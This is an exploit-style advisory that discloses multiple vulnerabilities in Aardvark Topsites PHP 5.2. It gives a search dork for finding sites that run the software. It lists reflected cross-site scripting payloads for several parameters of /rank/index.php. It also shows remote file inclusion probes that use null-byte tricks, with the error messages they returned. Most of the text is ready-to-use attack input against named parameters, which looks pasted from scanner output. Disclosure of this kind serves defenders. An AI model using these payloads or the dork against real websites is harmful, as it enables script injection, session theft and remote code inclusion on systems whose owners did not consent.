Aardvark Topsites PHP 5.2 Multi Vulnerability
=============================================
Author :  indoushka
Vondor :  www.p30vel.ir http://www.aardvarktopsitesphp.com/   http://www.avatic.com/
Dork   :  My Topsites List - Powered by Aardvark Topsites PHP 5.2.1
======================================

Cross site scripting (verified) :

This vulnerability affects /rank/index.php. 

Attack details :

URL encoded GET input q was set to 1" onmouseover=prompt(999881) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input title was set to Mr." onmouseover=prompt(903995) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input u was set to 1" onmouseover=prompt(986160) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input url was set to #" onmouseover=prompt(915056) //
The input is reflected inside a tag parameter between double quotes.

File inclusion :

URL encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found: 
Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php' 

URL encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found: 
Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'